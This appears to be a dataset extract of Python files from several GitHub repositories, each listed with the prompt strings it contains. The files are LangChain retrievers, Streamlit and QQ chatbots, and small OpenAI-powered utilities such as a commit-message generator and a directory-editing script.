date_collected (stringclasses, 1 value) | repo_name (stringlengths 6-116) | file_name (stringlengths 2-220) | file_contents (stringlengths 13-357k) | prompts (sequence) |
---|---|---|---|---|
2024-01-10 | pengwork/langchain | langchain~retrievers~elastic_search_bm25.py | """Wrapper around Elasticsearch vector database."""
from __future__ import annotations
import uuid
from typing import Any, Iterable, List
from langchain.docstore.document import Document
from langchain.schema import BaseRetriever
class ElasticSearchBM25Retriever(BaseRetriever):
"""Wrapper around Elasticsearch using BM25 as a retrieval method.
To connect to an Elasticsearch instance that requires login credentials,
including Elastic Cloud, use the Elasticsearch URL format
https://username:password@es_host:9243. For example, to connect to Elastic
Cloud, create the Elasticsearch URL with the required authentication details and
pass it to the ElasticVectorSearch constructor as the named parameter
elasticsearch_url.
You can obtain your Elastic Cloud URL and login credentials by logging in to the
Elastic Cloud console at https://cloud.elastic.co, selecting your deployment, and
navigating to the "Deployments" page.
To obtain your Elastic Cloud password for the default "elastic" user:
1. Log in to the Elastic Cloud console at https://cloud.elastic.co
2. Go to "Security" > "Users"
3. Locate the "elastic" user and click "Edit"
4. Click "Reset password"
5. Follow the prompts to reset the password
The format for Elastic Cloud URLs is
https://username:password@cluster_id.region_id.gcp.cloud.es.io:9243.
"""
def __init__(self, client: Any, index_name: str):
self.client = client
self.index_name = index_name
@classmethod
def create(
cls, elasticsearch_url: str, index_name: str, k1: float = 2.0, b: float = 0.75
) -> ElasticSearchBM25Retriever:
from elasticsearch import Elasticsearch
# Create an Elasticsearch client instance
es = Elasticsearch(elasticsearch_url)
# Define the index settings and mappings
settings = {
"analysis": {"analyzer": {"default": {"type": "standard"}}},
"similarity": {
"custom_bm25": {
"type": "BM25",
"k1": k1,
"b": b,
}
},
}
mappings = {
"properties": {
"content": {
"type": "text",
"similarity": "custom_bm25", # Use the custom BM25 similarity
}
}
}
# Create the index with the specified settings and mappings
es.indices.create(index=index_name, mappings=mappings, settings=settings)
return cls(es, index_name)
def add_texts(
self,
texts: Iterable[str],
refresh_indices: bool = True,
) -> List[str]:
"""Run more texts through the embeddings and add to the retriver.
Args:
texts: Iterable of strings to add to the retriever.
refresh_indices: bool to refresh ElasticSearch indices
Returns:
List of ids from adding the texts into the retriever.
"""
try:
from elasticsearch.helpers import bulk
except ImportError:
raise ValueError(
"Could not import elasticsearch python package. "
"Please install it with `pip install elasticsearch`."
)
requests = []
ids = []
for i, text in enumerate(texts):
_id = str(uuid.uuid4())
request = {
"_op_type": "index",
"_index": self.index_name,
"content": text,
"_id": _id,
}
ids.append(_id)
requests.append(request)
bulk(self.client, requests)
if refresh_indices:
self.client.indices.refresh(index=self.index_name)
return ids
def get_relevant_documents(self, query: str) -> List[Document]:
query_dict = {"query": {"match": {"content": query}}}
res = self.client.search(index=self.index_name, body=query_dict)
docs = []
for r in res["hits"]["hits"]:
docs.append(Document(page_content=r["_source"]["content"]))
return docs
async def aget_relevant_documents(self, query: str) -> List[Document]:
raise NotImplementedError
| [
"{'type': 'text', 'similarity': 'custom_bm25'}"
] |
2024-01-10 | Aznoryusof/candidate_chatai | database~create_db_from_docs.py | import os
import sys
from langchain.document_loaders import DirectoryLoader
from langchain.vectorstores import Chroma
from langchain.embeddings import HuggingFaceInstructEmbeddings
from langchain.text_splitter import RecursiveCharacterTextSplitter
from dotenv import load_dotenv
load_dotenv()
MAIN_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.append(MAIN_DIR)
DB_PATH = os.environ.get('DB_PATH')
DOCS_PATH = os.environ.get('DOCS_PATH')
EMBEDDINGS_PATH = os.environ.get('EMBEDDINGS_PATH')
EMBEDDINGS_MODEL = os.environ.get('EMBEDDINGS_MODEL')
CHUNK_SIZE = int(os.environ.get('CHUNK_SIZE'))
CHUNK_OVERLAP = int(os.environ.get('CHUNK_OVERLAP'))
def setup_knowledge_base(docs_dir, db_path, embeddings_model):
loader = DirectoryLoader(docs_dir, glob="**/*.txt")
docs = loader.load()
embeddings = HuggingFaceInstructEmbeddings(
model_name=embeddings_model,
cache_folder=EMBEDDINGS_PATH
)
text_splitter = RecursiveCharacterTextSplitter(chunk_size=CHUNK_SIZE, chunk_overlap=CHUNK_OVERLAP)
texts = text_splitter.split_documents(docs)
_ = Chroma.from_documents(texts, embeddings, persist_directory=db_path)
if __name__ == "__main__":
setup_knowledge_base(
os.path.join(MAIN_DIR, DOCS_PATH),
os.path.join(MAIN_DIR, DB_PATH),
EMBEDDINGS_MODEL
) | [] |
2024-01-10 | Aznoryusof/candidate_chatai | app_streamlit~streamlit.py | import os
import sys
MAIN_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.append(MAIN_DIR)
import streamlit as st
from dotenv import load_dotenv
from langchain.embeddings import HuggingFaceInstructEmbeddings
from langchain.callbacks.base import BaseCallbackHandler
from langchain.callbacks import FileCallbackHandler
from app_streamlit.retrieve import build_chain, run_chain
from loguru import logger
load_dotenv()
EMBEDDINGS_MODEL = os.environ.get('EMBEDDINGS_MODEL')
EMBEDDINGS_PATH = os.environ.get('EMBEDDINGS_PATH')
MAX_HISTORY_LENGTH = int(os.environ.get('MAX_HISTORY_LENGTH'))
REPHRASED_TOKEN = os.environ.get('REPHRASED_TOKEN') # This helps streamlit to ignore the response from the API used to rephrase the question based on history
LOG_FILE_PATH = os.path.join(MAIN_DIR, os.environ.get('LOG_FILE_PATH'))
logger.add(LOG_FILE_PATH, colorize=True, enqueue=True)
log_handler = FileCallbackHandler(LOG_FILE_PATH)
st.set_page_config(page_title="AIAssistant-Aznor", page_icon="🧑💼")
class StreamHandler(BaseCallbackHandler):
def __init__(self, container, initial_text="", rephrased_token=REPHRASED_TOKEN):
self.container=container
self.text=initial_text
self.is_rephrased=None
self.rephrased_token=REPHRASED_TOKEN
def on_llm_new_token(self, token, **kwargs):
if self.rephrased_token not in token:
self.text+=token
self.container.markdown(self.text + "▌")
def render_app():
custom_css = """
<style>
.stTextArea textarea {font-size: 13px;}
div[data-baseweb="select"] > div {font-size: 13px !important;}
</style>
<style>
button {
height: 30px !important;
width: 150px !important;
padding-top: 10px !important;
padding-bottom: 10px !important;
}
</style>
"""
st.markdown(custom_css, unsafe_allow_html=True)
hide_streamlit_style = """
<style>
#MainMenu {visibility: hidden;}
footer {visibility: hidden;}
</style>
"""
st.markdown(hide_streamlit_style, unsafe_allow_html=True)
st.subheader("Hello, I am an AI Assistant. \n\n I am here to share more about Aznor and how he can be an asset to your organization. \n\n Ask me anything in the chat box below.")
if "chat_dialogue" not in st.session_state:
st.session_state["chat_dialogue"] = []
if "chat_dialogue_display" not in st.session_state:
st.session_state["chat_dialogue_display"] = []
def clear_history():
st.session_state["chat_dialogue"] = []
def clear_history_all():
st.session_state["chat_dialogue"] = []
st.session_state["chat_dialogue_display"] = []
embedding_function = HuggingFaceInstructEmbeddings(
model_name=EMBEDDINGS_MODEL,
cache_folder=EMBEDDINGS_PATH
)
# Display chat messages from history on app rerun
for message in st.session_state.chat_dialogue_display:
with st.chat_message(message["role"]):
st.markdown(message["content"])
if len(st.session_state.chat_dialogue) >= MAX_HISTORY_LENGTH:
clear_history()
if prompt := st.chat_input("Type your questions here..."):
# Display user message in chat message container
with st.chat_message("user"):
st.markdown(prompt)
# Display message from LLM
with st.chat_message("assistant"):
answer_placeholder = st.empty()
stream_handler = StreamHandler(answer_placeholder)
chain = build_chain(embedding_function, [stream_handler, log_handler])
try:
output = run_chain(chain, prompt, st.session_state.chat_dialogue)
answer = output["answer"]
logger.info(output)
except Exception:
output = {}
answer = "I am sorry I am unable to respond to your question."
logger.info(output)
answer_placeholder.markdown(answer + "▌")
if 'source_documents' in output:
with st.expander("Documents Referenced"):
for _sd in output.get('source_documents'):
_sd_metadata = _sd.metadata
source = _sd_metadata.get("source")
st.text(f"Location: {source}")
# Add user message to chat history and display
st.session_state.chat_dialogue.append({"role": "user", "content": prompt})
st.session_state.chat_dialogue_display.append({"role": "user", "content": prompt})
# Add assistant response to chat history and display
st.session_state.chat_dialogue.append({"role": "assistant", "content": answer})
st.session_state.chat_dialogue_display.append({"role": "assistant", "content": answer})
col1, col2 = st.columns([10, 4])
with col1:
pass
with col2:
st.button("Clear History", use_container_width=True, on_click=clear_history_all)
render_app()
| [
"I am sorry I am unable to respond to your question."
] |
2024-01-10 | quisitive-spatel/ShiseidoCB | code~utilities~customprompt.py | # flake8: noqa
from langchain.prompts import PromptTemplate
template = """{summaries}
Please reply to the question using only the information present in the text above.
Include references to the sources you used to create the answer if those are relevant ("SOURCES").
If you can't find it, reply politely that the information is not in the knowledge base.
Question: {question}
Answer:"""
PROMPT = PromptTemplate(template=template, input_variables=["summaries", "question"])
EXAMPLE_PROMPT = PromptTemplate(
template="Content: {page_content}\nSource: {source}",
input_variables=["page_content", "source"],
)
| [
"question",
"{summaries}\nPlease reply to the question using only the information present in the text above. \nInclude references to the sources you used to create the answer if those are relevant (\"SOURCES\"). \nIf you can't find it, reply politely that the information is not in the knowledge base.\nQuestion: {question}\nAnswer:",
"Content: {page_content}\nSource: {source}",
"page_content"
] |
2024-01-10 | quisitive-spatel/ShiseidoCB | code~utilities~helper.py | import os
import openai
from dotenv import load_dotenv
import logging
import re
import hashlib
from langchain.embeddings.openai import OpenAIEmbeddings
from langchain.llms import AzureOpenAI
from langchain.vectorstores.base import VectorStore
from langchain.chains import ChatVectorDBChain
from langchain.chains import ConversationalRetrievalChain
from langchain.chains.qa_with_sources import load_qa_with_sources_chain
from langchain.chains.llm import LLMChain
from langchain.chains.chat_vector_db.prompts import CONDENSE_QUESTION_PROMPT
from langchain.prompts import PromptTemplate
from langchain.document_loaders.base import BaseLoader
from langchain.document_loaders import WebBaseLoader
from langchain.text_splitter import TokenTextSplitter, TextSplitter
from langchain.document_loaders.base import BaseLoader
from langchain.document_loaders import TextLoader
from langchain.chat_models import ChatOpenAI
from langchain.schema import AIMessage, HumanMessage, SystemMessage
from utilities.formrecognizer import AzureFormRecognizerClient
from utilities.azureblobstorage import AzureBlobStorageClient
from utilities.translator import AzureTranslatorClient
from utilities.customprompt import PROMPT
from utilities.redis import RedisExtended
import pandas as pd
import urllib
from fake_useragent import UserAgent
class LLMHelper:
def __init__(self,
document_loaders : BaseLoader = None,
text_splitter: TextSplitter = None,
embeddings: OpenAIEmbeddings = None,
llm: AzureOpenAI = None,
temperature: float = 0.75,
max_tokens: int = 500,
custom_prompt: str = "",
vector_store: VectorStore = None,
k: int = None,
pdf_parser: AzureFormRecognizerClient = None,
blob_client: AzureBlobStorageClient = None,
enable_translation: bool = False,
translator: AzureTranslatorClient = None):
load_dotenv()
openai.api_type = "azure"
openai.api_base = os.getenv('OPENAI_API_BASE')
openai.api_version = "2023-03-15-preview"
openai.api_key = os.getenv("OPENAI_API_KEY")
# Azure OpenAI settings
self.api_base = openai.api_base
self.api_version = openai.api_version
self.index_name: str = "embeddings"
self.model: str = os.getenv('OPENAI_EMBEDDINGS_ENGINE_DOC', "text-embedding-ada-002")
self.deployment_name: str = os.getenv("OPENAI_ENGINE", os.getenv("OPENAI_ENGINES", "text-davinci-003"))
self.deployment_type: str = os.getenv("OPENAI_DEPLOYMENT_TYPE", "Text")
self.temperature: float = float(os.getenv("OPENAI_TEMPERATURE", 0.75)) if temperature is None else temperature
self.max_tokens: int = int(os.getenv("OPENAI_MAX_TOKENS", -1)) if max_tokens is None else max_tokens
self.prompt = PROMPT if custom_prompt == '' else PromptTemplate(template=custom_prompt, input_variables=["summaries", "question"])
# Vector store settings
self.vector_store_address: str = os.getenv('REDIS_ADDRESS', "localhost")
self.vector_store_port: int= int(os.getenv('REDIS_PORT', 6379))
self.vector_store_protocol: str = os.getenv("REDIS_PROTOCOL", "redis://")
self.vector_store_password: str = os.getenv("REDIS_PASSWORD", None)
if self.vector_store_password:
self.vector_store_full_address = f"{self.vector_store_protocol}:{self.vector_store_password}@{self.vector_store_address}:{self.vector_store_port}"
else:
self.vector_store_full_address = f"{self.vector_store_protocol}{self.vector_store_address}:{self.vector_store_port}"
self.chunk_size = int(os.getenv('CHUNK_SIZE', 500))
self.chunk_overlap = int(os.getenv('CHUNK_OVERLAP', 100))
self.document_loaders: BaseLoader = WebBaseLoader if document_loaders is None else document_loaders
self.text_splitter: TextSplitter = TokenTextSplitter(chunk_size=self.chunk_size, chunk_overlap=self.chunk_overlap) if text_splitter is None else text_splitter
self.embeddings: OpenAIEmbeddings = OpenAIEmbeddings(model=self.model, chunk_size=1) if embeddings is None else embeddings
if self.deployment_type == "Chat":
self.llm: ChatOpenAI = ChatOpenAI(model_name=self.deployment_name, engine=self.deployment_name, temperature=self.temperature, max_tokens=self.max_tokens if self.max_tokens != -1 else None) if llm is None else llm
else:
self.llm: AzureOpenAI = AzureOpenAI(deployment_name=self.deployment_name, temperature=self.temperature, max_tokens=self.max_tokens) if llm is None else llm
self.vector_store: RedisExtended = RedisExtended(redis_url=self.vector_store_full_address, index_name=self.index_name, embedding_function=self.embeddings.embed_query) if vector_store is None else vector_store
self.k : int = 3 if k is None else k
self.pdf_parser : AzureFormRecognizerClient = AzureFormRecognizerClient() if pdf_parser is None else pdf_parser
self.blob_client: AzureBlobStorageClient = AzureBlobStorageClient() if blob_client is None else blob_client
self.enable_translation : bool = False if enable_translation is None else enable_translation
self.translator : AzureTranslatorClient = AzureTranslatorClient() if translator is None else translator
self.user_agent: UserAgent = UserAgent()
self.user_agent.random
def add_embeddings_lc(self, source_url):
try:
documents = self.document_loaders(source_url).load()
# Convert to UTF-8 encoding for non-ascii text
for(document) in documents:
try:
if document.page_content.encode("iso-8859-1") == document.page_content.encode("latin-1"):
document.page_content = document.page_content.encode("iso-8859-1").decode("utf-8", errors="ignore")
except:
pass
docs = self.text_splitter.split_documents(documents)
# Remove half non-ascii character from start/end of doc content (langchain TokenTextSplitter may split a non-ascii character in half)
pattern = re.compile(r'[\x00-\x1f\x7f\u0080-\u00a0\u2000-\u3000\ufff0-\uffff]')
for doc in docs:
doc.page_content = re.sub(pattern, '', doc.page_content)
# Drop chunks that became empty, without mutating the list while iterating over it
docs = [doc for doc in docs if doc.page_content != '']
keys = []
for i, doc in enumerate(docs):
# Create a unique key for the document
source_url = source_url.split('?')[0]
filename = "/".join(source_url.split('/')[4:])
hash_key = hashlib.sha1(f"{source_url}_{i}".encode('utf-8')).hexdigest()
hash_key = f"doc:{self.index_name}:{hash_key}"
keys.append(hash_key)
doc.metadata = {"source": f"[{source_url}]({source_url}_SAS_TOKEN_PLACEHOLDER_)" , "chunk": i, "key": hash_key, "filename": filename}
self.vector_store.add_documents(documents=docs, redis_url=self.vector_store_full_address, index_name=self.index_name, keys=keys)
except Exception as e:
logging.error(f"Error adding embeddings for {source_url}: {e}")
raise e
def convert_file_and_add_embeddings(self, source_url, filename, enable_translation=False):
# Extract the text from the file
text = self.pdf_parser.analyze_read(source_url)
# Translate if requested
text = list(map(lambda x: self.translator.translate(x), text)) if self.enable_translation else text
# Upload the text to Azure Blob Storage
converted_filename = f"converted/{filename}.txt"
source_url = self.blob_client.upload_file("\n".join(text), f"converted/{filename}.txt", content_type='text/plain; charset=utf-8')
print(f"Converted file uploaded to {source_url} with filename {filename}")
# Update the metadata to indicate that the file has been converted
self.blob_client.upsert_blob_metadata(filename, {"converted": "true"})
self.add_embeddings_lc(source_url=source_url)
return converted_filename
def get_all_documents(self, k: int = None):
result = self.vector_store.similarity_search(query="*", k= k if k else self.k)
return pd.DataFrame(list(map(lambda x: {
'key': x.metadata['key'],
'filename': x.metadata['filename'],
'source': urllib.parse.unquote(x.metadata['source']),
'content': x.page_content,
'metadata' : x.metadata,
}, result)))
def get_semantic_answer_lang_chain(self, question, chat_history):
question_generator = LLMChain(llm=self.llm, prompt=CONDENSE_QUESTION_PROMPT, verbose=False)
doc_chain = load_qa_with_sources_chain(self.llm, chain_type="stuff", verbose=True, prompt=self.prompt)
chain = ConversationalRetrievalChain(
retriever=self.vector_store.as_retriever(),
question_generator=question_generator,
combine_docs_chain=doc_chain,
return_source_documents=True,
# top_k_docs_for_context= self.k
)
result = chain({"question": question, "chat_history": chat_history})
context = "\n".join(list(map(lambda x: x.page_content, result['source_documents'])))
sources = "\n".join(set(map(lambda x: x.metadata["source"], result['source_documents'])))
container_sas = self.blob_client.get_container_sas()
result['answer'] = result['answer'].split('SOURCES:')[0].split('Sources:')[0].split('SOURCE:')[0].split('Source:')[0]
sources = sources.replace('_SAS_TOKEN_PLACEHOLDER_', container_sas)
return question, result['answer'], context, sources
def get_embeddings_model(self):
OPENAI_EMBEDDINGS_ENGINE_DOC = os.getenv('OPENAI_EMEBDDINGS_ENGINE', os.getenv('OPENAI_EMBEDDINGS_ENGINE_DOC', 'text-embedding-ada-002'))
OPENAI_EMBEDDINGS_ENGINE_QUERY = os.getenv('OPENAI_EMEBDDINGS_ENGINE', os.getenv('OPENAI_EMBEDDINGS_ENGINE_QUERY', 'text-embedding-ada-002'))
return {
"doc": OPENAI_EMBEDDINGS_ENGINE_DOC,
"query": OPENAI_EMBEDDINGS_ENGINE_QUERY
}
def get_completion(self, prompt, **kwargs):
if self.deployment_type == 'Chat':
return self.llm([HumanMessage(content=prompt)]).content
else:
return self.llm(prompt)
| [] |
2024-01-10 | opq-osc/Botoy-RealChatGPTThisTime | bot_RealChatGPT.py | # -*- coding:UTF-8 -*-
####AIFreeChatV1.0####
import openai
from botoy import GroupMsg,Action,S,Botoy
from botoy import decorators as deco
from botoy.collection import MsgTypes
from botoy.decorators import these_msgtypes,from_these_groups
from botoy.contrib import plugin_receiver
import os
import ast
from urllib import parse
openai.api_key = 'XXXXXXXXXXXXXXXXXXXX' # Fill in your API key here
Name = "XXXX" # Your bot's nickname
@plugin_receiver.group
@deco.ignore_botself
@from_these_groups(XXXXXXXXX) # Your QQ group number
@these_msgtypes(MsgTypes.AtMsg)
def main(ctx=GroupMsg):
if Name in ctx.Content.strip():
MsgPre = ast.literal_eval(ctx.Content)
Msg = MsgPre.get('Content')
print(Msg.replace(Name + " ",''))
if Msg.find(Name) == 0:
promptlist = []
if len(Msg.replace(Name + " ",'')) > 2:
with open("Chat.txt","a") as w:
w.write("\nuserprompt:")
w.write(Msg.replace(Name + " ",''))
w.close()
with open("Chat.txt","r") as f:
for line in f.readlines():
line = line.strip('\n')
if 'systemprompt' in line:
promptdic = {}
promptdic.update({"role":"system"})
promptdic.update({"content":line.replace("systemprompt:","")})
print(promptdic)
promptlist.append(promptdic)
print("1")
if 'userprompt' in line:
promptdic = {}
promptdic.update({"role":"user"})
promptdic.update({"content":line.replace(Name + " ",'').replace("userprompt:","")})
promptlist.append(promptdic)
print("2")
if 'assistantprompt' in line:
promptdic = {}
promptdic.update({"role":"assistant"})
promptdic.update({"content":line.replace("assistantprompt:","")})
promptlist.append(promptdic)
print("3")
f.close()
print(promptlist)
try:
response = openai.ChatCompletion.create(
model="gpt-3.5-turbo",
messages=promptlist,
temperature=0.7,
max_tokens=800
)
print(response)
AnswerPre = response.get('choices')[0].get('message').get('content').replace('\\x', '%').encode('utf-8').decode('utf-8')
Answer = parse.unquote(AnswerPre)
S.bind(ctx).text(Answer,True)
with open("Chat.txt","a") as a:
a.write("\nassistantprompt:")
a.write(Answer.replace("\n",""))
a.close()
except openai.error.APIConnectionError:
S.bind(ctx).text("网络丢包,请重试",'utf-8')
except openai.error.InvalidRequestError:
S.bind(ctx).text("对话缓存已满,已自动清理,请重试",'utf-8')
os.system("python3 replace_onetime.py")
else:
S.bind(ctx).text("已禁止简单问题",'utf-8')
Action(ctx.CurrentQQ).shutUserUp(
groupID=ctx.FromGroupId,
userid=ctx.FromUserId,
ShutTime=2
)
bot = Botoy(
qq = XXXXXXXX, # Your QQ bot's account number
#use_plugins = True
)
if __name__ == "__main__":
bot.run()
| [
"systemprompt:",
"{}",
"assistantprompt:",
"userprompt:",
" ",
"[]"
] |
2024-01-10 | johntiger1/gpt-cli | CommitMessageGPT.py | import openai
import os
import subprocess
import git
# Set up OpenAI API credentials
openai.api_key = os.environ["OPENAI_API_KEY"]
PRODUCT_NAME = "Commit Message Generator, powered using GPT"
PRODUCT_NAME_SHORT_FORM = "CMG-GPT"
DRY_RUN = True
DIFF_CACHED_MODE = True
if DIFF_CACHED_MODE:
CACHED_ARG = "--cached"
else:
CACHED_ARG = ""
print(f'Welcome to {PRODUCT_NAME}. Running with {CACHED_ARG} .'
f'Generating your automated git message...')
# Set up Git repository path and branch name
repo_path = os.getcwd()
repo_path = '/Users/johnchen/src/offergenmodels'
# Connect to the Git repository
repo = git.Repo(repo_path)
if CACHED_ARG:
diff_output = subprocess.check_output(["git", "diff", CACHED_ARG, "--no-color"], cwd=repo_path).decode("utf-8")
else:
diff_output = subprocess.check_output(["git", "diff", "--no-color"], cwd=repo_path).decode("utf-8")
if diff_output == '':
print('no git diff output detected; nothing to commit')
exit(0)
modified_files = [item.a_path for item in repo.index.diff(None) if item.change_type != 'D']
# print(diff_output)
total_payload = f'''{diff_output}'''
example_git_messages = '''
git commit -m "Fix typo in header of README.md"
git commit -m "Add new feature to user profile page"
git commit -m "Refactor file handling logic for improved performance"
git commit -m "Update dependencies to fix security vulnerability"
git commit -m "Remove unused code and files"
git commit -m "Improve error handling for invalid input"
'''
summary = openai.Completion.create(
engine="text-davinci-003",
prompt=f"Create a `git commit` message based on the git diff output. "
# f"If there are no changes to the files, then please specify 'no changes detected'."
# f"Prepend `generated with {PRODUCT_NAME_SHORT_FORM}` to the "
# f"start of your git commit message. "
f"Here is the git diff:"
f"{total_payload}"
f" ",
max_tokens=60,
n=1,
stop=None,
temperature=0.2,
presence_penalty=-1
)["choices"][0]["text"].strip()
index = repo.index
for file in modified_files:
index.add([file])
if not DRY_RUN:
index.commit(summary)
print(f"git commit -m {summary}") | [
"Create a `git commit` message based on the git diff output. "
] |
2024-01-10 | johntiger1/gpt-cli | async_gpt.py | import openai
import os
import time
import queue
import threading
import keyboard
# Set up OpenAI API credentials
openai.api_key = os.environ["OPENAI_API_KEY"]
# Set up the GPT-3 model
model_engine = "gpt-3.5-turbo"
SKIP_PROMPT = "I have nothing to say right now."
history = [
{"role": "system", "content": "You are assistantGPT. You are a helpful assistant, who also has the ability to "
"query the user every 10s for any input that you believe "
"may further assist them. If the previous message included the phrase "
"'I have nothing to say right now', then generate the empty response ( ). "
"}"},
]
# Create a message queue to handle user input
message_queue = queue.Queue()
# Define a function to generate a response
def generate_response(prompt):
global history
if prompt == SKIP_PROMPT:
prompt = "I am still thinking of what to ask. Please ask me a clarifying question."
new_message = {"role": "user", "content": "Please me a great, asynchronous assistant with my daily life. "
"Some common things to ask me are: - have i responded to all my work emails yet?"
"- have I followed up with Jim from accounting on getting those invoices done?"
"- is it anyone's birthday yet? If there is nothing relevant right now, it is always"
"ok to ask me how my day is going and where my head space is."
"\n However, please make it relevant to the conversation we are having."
+ prompt
}
history.append(new_message)
completion = openai.ChatCompletion.create(
model=model_engine,
messages=history
)
# Command to execute the command
system_output_response = completion.choices[0].message.content
output_dict = {"role":"assistant", "content":f"{system_output_response}"}
history.append(output_dict)
history.extend(history[:2])
return system_output_response
def execute_response(response):
'''in the future, we can do zero-shot toxicity detection '''
print(response)
def handle_user_input():
while True:
user_input = input("You: ")
if user_input.lower() == "exit":
exit(0)
message_queue.put(user_input)
def handle_message_queue():
last_user_input_time = 0
while True:
if message_queue.qsize() > 0:
user_input = message_queue.get()
prompt = user_input
last_user_input_time = time.time()
elif time.time() - last_user_input_time >= 5 and not any(keyboard.is_pressed(key) for key in keyboard.all_modifiers):
prompt = SKIP_PROMPT
last_user_input_time = time.time()
print("USER_PROMPT SKIPPED")
else:
time.sleep(1)
continue
response = str(generate_response(prompt))
execute_response(response)
if __name__ == "__main__":
print('Welcome to asyncGPT. Type "exit" to quit at any time')
user_input = input("You: ")
prompt = "\nUser: " + user_input
response = str(generate_response(prompt))
execute_response(response)
# Create and start threads to handle user input and message queue
user_input_thread = threading.Thread(target=handle_user_input)
message_queue_thread = threading.Thread(target=handle_message_queue)
user_input_thread.start()
message_queue_thread.start()
# Wait for threads to finish
user_input_thread.join()
message_queue_thread.join()
| [
"I have nothing to say right now.",
"PLACEHOLDER",
"You are assistantGPT. You are a helpful assistant, who also has the ability to query the user every 10s for any input that you believe may further assist them. If the previous message included the phrase 'I have nothing to say right now', then generate the empty response ( ). }",
"I am still thinking of what to ask. Please ask me a clarifying question.",
"Please me a great, asynchronous assistant with my daily life. Some common things to ask me are: - have i responded to all my work emails yet?- have I followed up with Jim from accounting on getting those invoices done?- is it anyone's birthday yet? If there is nothing relevant right now, it is alwaysok to ask me how my day is going and where my head space is.\n However, please make it relevant to the conversation we are having.PLACEHOLDER",
"\nUser: PLACEHOLDER"
] |
2024-01-10 | johntiger1/gpt-cli | updateDirectory.py | import os
import json
import mimetypes
import openai
import requests
import regex
def get_file_contents(filepath):
mimetype, encoding = mimetypes.guess_type(filepath)
if encoding is None:
encoding = 'utf-8'
with open(filepath, 'r', encoding=encoding) as f:
try:
return f.read()
except UnicodeDecodeError:
return None
def get_dir_contents(dirpath):
dir_contents = {}
for name in os.listdir(dirpath):
path = os.path.join(dirpath, name)
if os.path.isfile(path):
contents = get_file_contents(path)
if contents is not None:
dir_contents[name] = contents
elif os.path.isdir(path):
sub_dir_contents = get_dir_contents(path)
if sub_dir_contents:
dir_contents[name] = sub_dir_contents
return dir_contents
def dir_to_json(dirpath):
dir_contents = get_dir_contents(dirpath)
return json.dumps(dir_contents, indent=4)
def apply_changes_to_dir(changes, dirpath):
for name, change in changes.items():
path = os.path.join(dirpath, name)
if isinstance(change, dict):
if not os.path.isdir(path):
os.mkdir(path)
apply_changes_to_dir(change, path)
elif change == "__DELETE__":
if os.path.isfile(path):
os.remove(path)
else:
with open(path, 'w', encoding='utf-8') as f:
f.write(change)
# Prompt for OpenAI GPT-3.5-Turbo API
user_prompt = input("Please enter the prompt: ")
# Set up OpenAI API credentials
openai.api_key = os.environ["OPENAI_API_KEY"]
# Set up the GPT-3 model
model_engine = "gpt-3.5-turbo"
with open('prompt.txt', 'r') as file:
model_prompt = file.read().replace('\n', '')
gpt_input = [
{"role": "system", "content": model_prompt}
]
# Prompt user to enter directory path
dirpath = input("Please enter the directory path: ")
json_data = dir_to_json(dirpath)
# Call OpenAI GPT-3.5-Turbo API to complete the JSON object
content = "User Prompt: " + user_prompt + "\n" + "JSON object representing directory and file content: " + "\n" + json_data
CONTENT_DICT = {"role": "user", "content": content}
gpt_input.append(CONTENT_DICT)
completion = openai.ChatCompletion.create(
model="gpt-3.5-turbo",
messages=gpt_input
)
system_output_response = completion.choices[0].message.content
pattern = regex.compile(r'\{(?:[^{}]|(?R))*\}')
json_string = pattern.findall(system_output_response)[0]
json_dict = json.loads(json_string)
print(json_dict)
# apply_changes_to_dir(json_dict, dirpath) | [
"Please enter the prompt: ",
"\n",
"User Prompt: PLACEHOLDER\nJSON object representing directory and file content: \nPLACEHOLDER"
] |
2024-01-10 | johntiger1/gpt-cli | imagegpt.py | import openai
import os
import re
# Set up OpenAI API credentials
openai.api_key = os.environ["OPENAI_API_KEY"]
# Set up the GPT-3 model
model_engine = "gpt-3.5-turbo"
prompt = "Hello, how can I assist you today?"
# Define a function to generate a response
def generate_response(prompt):
response = openai.ChatCompletion.create(
model=model_engine,
messages=[{"role": "user", "content": prompt}],
max_tokens=1024,
n=1,
stop=None,
temperature=0.5,
)
message = response.choices[0].message.content.strip()
return message
def generate_respone_v2(prompt):
import os
import openai
openai.api_key = os.getenv("OPENAI_API_KEY")
pattern = "___code____"
completion = openai.ChatCompletion.create(
model="gpt-3.5-turbo",
messages=[
{"role": "system", "content": "You are codeGPT. You return runnable code only. Produce"
"an error message if appropriate.}"},
{"role": "user", "content": f"Produce ONLY executable code for the following prompt. Do not include any explanation or natural language"
# f"Give me a runnable python program for the following question. "
# f""
# f"Surround ONLY the "
# f"executable code block with {pattern} before and after; i.e. make sure that what is surrounded "
# f"by {pattern} is executable: "
+ prompt}
# {"role": "user", content: "" }
]
)
re_pattern = fr"{pattern}\s*(.*?)\s*{pattern}"
match = re.search(re_pattern, str(completion.choices[0].message), re.DOTALL)
# Code to extract the command
if match:
code = match.group(1)
print('code extracted')
print("")
print("this is the extracted code",code.strip())
# You: write me an endpoint for a flask POST request that accepts image upload, with a ratelimiter
# Sanitization layer
# Command to execute the command
print(str(completion.choices[0].message.content))
# return completion.choices[0].message
def generate_response_image(prompt):
import time
start_time = time.time()
print('starting API call')
response = openai.Image.create_edit(
image=open("14.png", "rb"),
mask=open("square_mask.png", "rb"),
prompt=f"Make the area red",
n=5,
size="256x256"
)
with open(f"{prompt}.txt", "w") as file:
for item in response['data']:
file.write(str(item['url']) + "\n")
end_time = time.time()
elapsed_time = end_time - start_time
print(f"Elapsed time: {elapsed_time} seconds")
print("image mode selected")
# Get input from the user and generate a response
while True:
user_input = input("You: ")
if user_input.lower() == "exit":
break
prompt = "\nUser: " + user_input
response = generate_response_image(prompt)
print('finished command')
# print("ChatGPT: " + response)
| [
"Produce ONLY executable code for the following prompt. Do not include any explanation or natural language",
"\nUser: PLACEHOLDER",
"You are codeGPT. You return runnable code only. Producean error message if appropriate.}",
"Hello, how can I assist you today?"
] |
2024-01-10 | 7uk3y/aiserchdemo | stindex3.py | import os, streamlit as st
from PIL import Image
# Uncomment to specify your OpenAI API key here (local testing only, not in production!), or add corresponding environment variable (recommended)
# os.environ['OPENAI_API_KEY']= ""
from llama_index import VectorStoreIndex, SimpleDirectoryReader, LLMPredictor, PromptHelper, ServiceContext
from langchain.llms.openai import OpenAI
from llama_index import StorageContext, load_index_from_storage
image = Image.open('logo.png')
# Define a simple Streamlit app
st.image(image, width=100)
query = st.text_input("What would you like to ask? (source: data/)")
# If the 'Submit' button is clicked
if st.button("Submit"):
